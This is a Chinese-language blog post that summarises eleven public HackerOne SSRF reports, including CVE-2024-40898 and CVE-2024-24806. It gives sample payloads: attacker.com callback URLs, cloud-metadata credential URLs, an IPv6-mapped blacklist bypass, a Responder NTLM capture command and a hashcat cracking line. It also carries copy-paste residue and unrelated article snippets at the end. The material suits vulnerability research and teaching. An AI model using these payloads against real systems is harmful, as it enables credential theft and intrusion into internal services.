SSRF漏洞公开报告分析

news2025/4/18 23:34:49

文章目录

      • 1. SSRF | 获取元数据 | 账户接管
      • 2. AppStore | 版本上传表单 | Blind SSRF
      • 3. HOST SSRF
        • 一、为什么HOST修改不会影响正常访问
        • 二、案例
      • 4. Turbonomic 的 终端节点 | SSRF 获取元密钥
        • 一、介绍
        • 二、漏洞分析
      • 5. POST | Blind SSRF
      • 6. CVE-2024-40898利用 | SSRF + 泄露 NTLM
        • 一、CVE介绍
        • 二、复现
        • 2. 破解哈希
      • 7. POST | SSRF
        • Twilio Webhook 功能背景:
        • 2. 漏洞触发点
      • 8. CVE-2024-24806 | NodeJS | SSRF
        • 🧨 漏洞编号:
        • 🛠️ 漏洞成因:
      • 9. IPv6绕过 IP黑名单
        • 1. IPv6 映射地址解析缺陷
        • 2. 漏洞触发逻辑
        • 3. 漏洞利用条件
      • 10. GET | SSRF
        • 🔁 复现步骤(Steps To Reproduce)
      • 11. 邮件应用程序中的盲SSRF
        • 漏洞复现与验证:

1. SSRF | 获取元数据 | 账户接管

Autodesk | Report #3024673 - SSRF in Autodesk Rendering leading to account takeover | HackerOne

2. AppStore | 版本上传表单 | Blind SSRF

Nextcloud | Report #2925666 - Blind SSRF Vulnerability in Appstore Release Upload Form | HackerOne

  • 攻击者提交以下恶意 URL,探测服务器是否访问了指定地址:

    icon_url=http://attacker.com/log?payload=test
    

    通过检查 attacker.com 的访问日志,若发现来自 AppStore 服务器的请求,则确认漏洞存在。

  • 进一步利用:

    icon_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/  # 获取云服务器临时凭证
    

3. HOST SSRF

IBM | Report #2696271 - SSRF via host header let access localhost via https://go.dialexa.com | HackerOne

一、为什么HOST修改不会影响正常访问

✅ 实际请求是由目标服务器发出的,它会根据 URL 的主机名去解析 IP 并建立连接。

请求流程通常是这样的:

目标服务发出 HTTP 请求 -> 解析 URL 中的主机名 -> 建立 TCP 连接 -> 发送 HTTP 请求(包含 Host)

举例:

http复制编辑POST https://eva2.csdn.net/v3/xxx HTTP/1.1
Host: 127.0.0.1

此时:

  • TCP 连接建立在 eva2.csdn.net 这个域名解析出来的 IP 上
  • HTTP 请求头里的 Host 不影响实际连接目标
二、案例

攻击姿势
篡改 Host 标头,诱导服务器向该地址发起内部请求。
示例请求

GET /api/health HTTP/1.1
Host: 127.0.0.1:8080  # 篡改后的目标

攻击逻辑

  • 服务器代码使用 Host 标头动态生成内部请求:

    internal_url = f"http://{request.headers['Host']}/admin"
    requests.get(internal_url)  # 实际访问 http://127.0.0.1:8080/admin
    
  • 请求仍发送到 victim.com 的公网 IP,但服务器自身会代理访问 127.0.0.1

生效条件

  • 应用程序逻辑依赖 Host 标头构造请求地址。
  • 服务器可访问本地或内网服务(如本地数据库、管理接口)。

4. Turbonomic 的 终端节点 | SSRF 获取元密钥

IBM | Report #2697592 - SSRF and secret key disclosure found on Turbonomic endpoint | HackerOne

IBM | Report #2697601 - SSRF and secret key disclosure found on Turbonomic endpoint | HackerOne

一、介绍

Turbonomic 是一款用于混合云环境的资源优化与管理平台,其核心功能包括自动化资源分配、性能监控和成本优化。由于需要深度集成云服务、虚拟化平台及物理基础设施,Turbonomic 通常拥有高权限访问各类 API 和内部系统。
终端节点(Endpoint) 是 Turbonomic 对外提供 API 或管理接口的入口,若存在安全缺陷,可能成为攻击者渗透的突破口。

二、漏洞分析
  • 触发点
    Turbonomic 的某个 API 终端节点接受用户可控的 URL 参数,用于请求外部资源(如获取监控数据、集成第三方服务)。
    示例请求

    POST /api/v3/fetch-resource HTTP/1.1
    Host: turbonomic.example.com
    ...
    {
        "resource_url": "http://user-provided-url.com/data"
    }
    
  • 漏洞逻辑
    若后端未对 resource_url 进行合法性校验,攻击者可构造恶意 URL(如内网地址、云元数据接口),诱导 Turbonomic 服务器发起内部请求。

5. POST | Blind SSRF

Acronis | Report #1086206 - Blind SSRF vulnerability on cz.acronis.com | HackerOne

漏洞复现步骤(PoC)

  1. 发送以下 POST 请求,在 address 参数中注入恶意 URL:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: cz.acronis.com
    ...
    address=http://jczo3ewu8jpfgyiajmkacspsnjtbh0.burpcollaborator.net/ssrf
    
  2. 服务器响应 200 OK,并触发对 Burp Collaborator回调请求(来源 IP:109.123.216.85)。

漏洞影响

  • 允许未认证攻击者诱导 WordPress 向任意地址(包括内网服务)发起 HTTP 请求。
  • 可进一步用于 内部网络探测敏感数据泄露网络放大攻击

6. CVE-2024-40898利用 | SSRF + 泄露 NTLM

Internet Bug Bounty | Report #2612028 - important: Apache HTTP Server: SSRF with mod_rewrite in server/vhost context on Windows (CVE-2024-40898) | HackerOne

一、CVE介绍

漏洞编号:CVE-2024-40898

影响组件:Apache HTTP Server(Windows 平台)tenablecloud.cn+7hkcert.org+7腾讯云 - 产业智变 云启未来+7

影响版本:2.4.0 至 2.4.61httpd.apache.org+2GitHub+2hkcert.org+2

漏洞类型:服务器端请求伪造(SSRF)hkcert.org+4阿里云漏洞库+4腾讯云 - 产业智变 云启未来+4

CVSS v3 分数:7.5(高危)

修复版本:2.4.62腾讯云 - 产业智变 云启未来+6tenablecloud.cn+6NVD+6

二、复现
  1. 搭建恶意 SMB 服务器
    使用 ResponderImpacket 监听 SMB 流量:

    responder -I eth0 -wrf
    
  2. 触发 SSRF
    发送构造的请求至漏洞 URL:

    GET /redirect?path=\\attacker-ip\share HTTP/1.1
    Host: victim.com
    
  3. 捕获哈希
    Responder 将捕获服务器的 NetNTLMv2 哈希,保存为 hash.txt

2. 破解哈希

使用 Hashcat 进行离线破解:

hashcat -m 5600 hash.txt /path/to/wordlist.txt

7. POST | SSRF

Rocket.Chat | Report #1886954 - Unauthenticated full-read SSRF via Twilio integration | HackerOne

Twilio Webhook 功能背景:
  • Twilio 集成
    Rocket.Chat 支持通过 Twilio 接收短信或语音通话通知。当 Twilio 接收到外部事件(如用户回复短信)时,会通过 Webhook 回调 将数据发送到 Rocket.Chat 的指定端点(如 /services/voip/events)。
  • 参数处理
    Webhook 端点可能解析 Twilio 请求中的参数(如 CallerFromRecordingUrl),并基于这些参数发起后续操作(如下载录音文件)。
2. 漏洞触发点
  • 未过滤的 URL 参数
    若 Rocket.Chat 在处理 Twilio 回调时,直接使用用户可控的 URL 参数(如 RecordingUrl)发起 HTTP 请求,且未校验目标地址的合法性,攻击者可注入恶意 URL。
    示例请求

    POST /services/voip/events HTTP/1.1
    Host: rocket.chat.example.com
    ...
    {
        "CallSid": "CAXXXXX",
        "RecordingUrl": "http://169.254.169.254/latest/meta-data"  // 恶意注入
    }
    
  • 代码逻辑缺陷
    漏洞版本的 Rocket.Chat 可能直接调用类似 HTTP.get(RecordingUrl) 的代码,未限制目标地址范围。

8. CVE-2024-24806 | NodeJS | SSRF

🧨 漏洞编号:
  • CVE:CVE-2024-24806
  • 影响组件libuv(Node.js 使用的底层异步 I/O 库)
  • 影响范围:所有 Node.js >= v10 的版本(只要依赖 libuv)
🛠️ 漏洞成因:
js复制编辑// 开发者检查是否包含内部网地址
const url = req.query.url;
if (url.includes('127.0.0.1') || url.includes('localhost')) {
    return res.status(403).send('Blocked');
}

http.get(url); // ⚠️ 直接使用,易受攻击

攻击者输入:

http://aaaaaaaaaaa...aaa0x7f000001

由于字符串太长,开发者的检查逻辑不会发现结尾是 0x7f000001,但 libuv 在调用 getaddrinfo() 前会截断为:

复制编辑
0x7f000001

而这个实际上等价于:

复制编辑
127.0.0.1

最终 SSRF 成功!

9. IPv6绕过 IP黑名单

HackerOne | Report #2301565 - Server Side Request Forgery (SSRF) in webhook functionality | HackerOne

1. IPv6 映射地址解析缺陷
  • IPv4-mapped IPv6 格式
    根据 RFC 4291,IPv4 地址可嵌入 IPv6 地址中,格式为 ::ffff:<IPv4>(如 ::ffff:127.0.0.1)。
  • 压缩表示
    IPv6 地址允许省略前导零,例如 ::ffff:a9fe:a9fe 等价于 ::ffff:169.254.169.254(AWS 元数据服务 IP)。
2. 漏洞触发逻辑
  • 攻击载荷构造
    攻击者在 Webhook 的 URL 参数中使用压缩的 IPv6 映射地址,绕过对 169.254.169.254 的黑名单过滤。
    示例

    header("Location: http://[::ffff:a9fe:a9fe]");  // 实际指向 169.254.169.254
    
  • 服务器行为
    应用程序解析 URL 时未规范化 IPv6 地址,直接发起请求,导致访问内部服务。

3. 漏洞利用条件
  • 输入控制
    Webhook 功能允许用户指定任意 URL。
  • 缺乏规范化校验
    未对 IPv6 地址进行展开和标准化处理,且黑名单仅覆盖 IPv4 格式。
  • 服务器出站权限
    服务器可访问内部网络或云元数据接口。

10. GET | SSRF

inDrive | Report #2300358 - SSRF in https://couriers.indrive.com/api/file-storage | HackerOne

🔁 复现步骤(Steps To Reproduce)

以 Burp Collaborator 为例展示漏洞触发过程:

  1. 发起如下请求(将 url 参数替换为你自己的 OAST 域名):

    GET /api/file-storage?url=http://va99zfc0lxpm75ogmcjhz8xij9pzdo.oastify.com
    
  2. 查看响应内容 & Burp Collaborator 的日志,发现目标服务器发出了对你提供域名的请求,说明 SSRF 成立。

11. 邮件应用程序中的盲SSRF

Nextcloud | Report #1869714 - Blind SSRF in Mail App | HackerOne

漏洞复现与验证:
  1. 搭建监听服务
    使用 Burp CollaboratorInteractsh 生成唯一域名(如 ssrf-test.attacker.com)。

  2. 构造恶意邮件
    在邮件正文或附件中插入监听 URL:

    <img src="http://ssrf-test.attacker.com">
    
  3. 发送邮件并监控
    观察监听服务是否收到来自邮件服务器的 HTTP/DNS 请求。
    😕/hackerone.com/reports/1869714)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2333350.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java 基础(4)—Java 对象布局及偏向锁、轻量锁、重量锁介绍

一、Java 对象内存布局 1、对象内存布局 一个对象在 Java 底层布局&#xff08;右半部分是数组连续的地址空间&#xff09;&#xff0c;如下图示&#xff1a; 总共有三部分总成&#xff1a; 1. 对象头&#xff1a;储对象的元数据&#xff0c;如哈希码、GC 分代年龄、锁状态…

【AI论文】OLMoTrace:将语言模型输出追溯到万亿个训练标记

摘要&#xff1a;我们提出了OLMoTrace&#xff0c;这是第一个将语言模型的输出实时追溯到其完整的、数万亿标记的训练数据的系统。 OLMoTrace在语言模型输出段和训练文本语料库中的文档之间找到并显示逐字匹配。 我们的系统由扩展版本的infini-gram&#xff08;Liu等人&#xf…

SAP GUI 显示SAP UI5应用,并实现SSO统一登陆

想用SAP UI5 做一写界面&#xff0c;又不想给用户用标准的Fiori APP怎么办&#xff1f;我觉得可以用可配置物料标准功能的思路&#xff0c;在SAP GUI中显示UI5界面&#xff0c;而不是跳转到浏览器。 代码实现后的效果如下&#xff1a; 1、调用UI5应用&#xff0c;适用于自开发…

HumanDil-Ox-LDL:保存:2-8℃保存,避免强光直射,不可冻存

化学试剂的基本介绍&#xff1a; /// 英文名称&#xff1a;HumanDil-Oxidized LowDensityLipoprotein /// 中文名称&#xff1a;人源红色荧光标记氧化型低密度脂蛋白 /// 浓度&#xff1a;1.0-4.0 mg/ml /// 外观&#xff1a;乳状液体 /// 缓冲液组分&#xff1a;PBS&…

开箱即用!推荐一款Python开源项目:DashGo,支持定制改造为测试平台!

大家好&#xff0c;我是狂师。 市面上的开源后台管理系统项目层出不穷&#xff0c;对应所使用到的技术栈也不尽相同。 今天给大家推荐一款开源后台管理系统: DashGo&#xff0c;不仅部署起来非常的简单&#xff0c;而且它是基于Python技术栈实现的&#xff0c;使得基于它进行…

JS小练习0.1——弹出姓名

分析&#xff1a;1.用户输入 2.内部处理保存数据 3.打印输出 <body><script>let name prompt(输入你的名字)document.write(name)</script> </body>

vue自定义颜色选择器

vue自定义颜色选择器 效果图&#xff1a; step0: 默认写法 调用系统自带的颜色选择器 <input type"color">step1:C:\Users\wangrusheng\PycharmProjects\untitled18\src\views\Home.vue <template><div class"container"><!-- 颜…

LibreOffice Writer使用01去除单词拼写判断的红色下划线

这个软件还是非常有特色的&#xff0c;因为大家需要office的全部功能&#xff0c;常常忽略了这个软件的使用体验。 csdn不是特别稳定&#xff0c;linux也没有什么比较好的md编辑器&#xff0c;所以我选择这个软件来记录我的临时博客&#xff0c;原因无他&#xff0c;它可以保存…

0401react中使用css-react-css-仿低代码平台项目

文章目录 1、普通方式-内联使用css2、引入css文件2.1、示例2.2、classnames 3、内联css与引入css文件对比3.1、内联css3.2、 外部 CSS 文件&#xff08;External CSS&#xff09; 4、css module5、sass6、classnames组合scss modules7、css-in-js7.1、CSS-in-JS 的核心特性7.2、…

《线性表、顺序表与链表》教案(C语言版本)

&#x1f31f; 各位看官好&#xff0c;我是maomi_9526&#xff01; &#x1f30d; 种一棵树最好是十年前&#xff0c;其次是现在&#xff01; &#x1f680; 今天来学习C语言的相关知识。 &#x1f44d; 如果觉得这篇文章有帮助&#xff0c;欢迎您一键三连&#xff0c;分享给更…

[ctfshow web入门] web33

信息收集 相较于上一题&#xff0c;这题多了双引号的过滤。我猜测这一题的主要目的可能是为了不让使用$_GET[a]之类的语句&#xff0c;但是$_GET[a]也是一样的 没有括号可以使用include&#xff0c;没有引号可以使用$_GET 可以参考[ctfshow web入门] web32&#xff0c;其中的所…

三、TorchRec中的Optimizer

TorchRec中的Optimizer 文章目录 TorchRec中的Optimizer前言一、嵌入后向传递与稀疏优化器融合如下图所示&#xff1a;二、上述图片的关键步骤讲解&#xff1a;三、优势四、与传统优化器对比总结 前言 TorchRec 模块提供了一个无缝 API&#xff0c;用于在训练中融合后向传递和…

webrtc pacer模块(一) 平滑处理的实现

Pacer起到平滑码率的作用&#xff0c;使发送到网络上的码率稳定。如下的这张创建Pacer的流程图&#xff0c;其中PacerSender就是Pacer&#xff0c;其中PacerSender就是Pacer。这篇文章介绍它的核心子类PacingController及Periodic模式下平滑处理的基本流程。平滑处理流程中还有…

河北工程大学e2e平台,python

题目&#xff0c;选择题包100分&#xff01; 题目&#xff0c;选择题包100分&#xff01; 题目&#xff0c;选择题包100分&#xff01; 联系&#x1f6f0;&#xff1a;18039589633

BeautifulSoup 踩坑笔记:SVG 显示异常的真正原因

“这图是不是糊了&#xff1f;”以为是样式缺了&#xff1f;试试手动复制差异在哪&#xff1f;想用对比工具一探究竟……简单到不能再简单的代码&#xff0c;有问题吗&#xff1f;最后的真相&#xff1a;viewBox vs viewbox&#xff0c;preserveAspectRatio vs preserveaspectr…

【browser-use+deepseek】实现简单的web-ui自动化

browser-use Web-UI 一、browser-use是什么 Browser Use 是一款开源Python库&#xff0c;专为大语言模型设计的智能浏览器工具&#xff0c;目的是让 AI 能够像人类一样自然地浏览和操作网页。它支持多标签页管理、视觉识别、内容提取&#xff0c;并能记录和重复执行特定动作。…

MOS管的发热原因和解决办法

发热来源 如上图&#xff0c;MOS管的工作状态有4种情况&#xff0c;分别是开通过程&#xff0c;导通过程&#xff0c;关断过程和截止过程。 导致发热的损耗主要有两种&#xff1a;开关损耗、导通损耗。 导通损耗 导通损耗比较好计算&#xff0c;根据驱动电压VGS值可以得到MOS…

科技项目验收测试怎么做?验收测试报告如何获取?

科技项目从研发到上市需要一个很长的周期&#xff0c;并且在上市之前还有一个至关重要的交付过程&#xff0c;那就是项目验收&#xff0c;验收需要通过验收测试来呈现。科技项目验收测试是确保项目成功交付的关键步骤&#xff0c;那么是如何进行的呢?企事业单位想要获取科技项…

AutoEval:现实世界中通才机器人操作策略的自主评估

25年3月来自 UC Berkeley 和 Nvidia 的论文“AutoEval: Autonomous Evaluation of Generalist Robot Manipulation Policies in the Real World”。 可规模化且可复现的策略评估一直是机器人学习领域长期存在的挑战。评估对于评估进展和构建更优策略至关重要&#xff0c;但在现…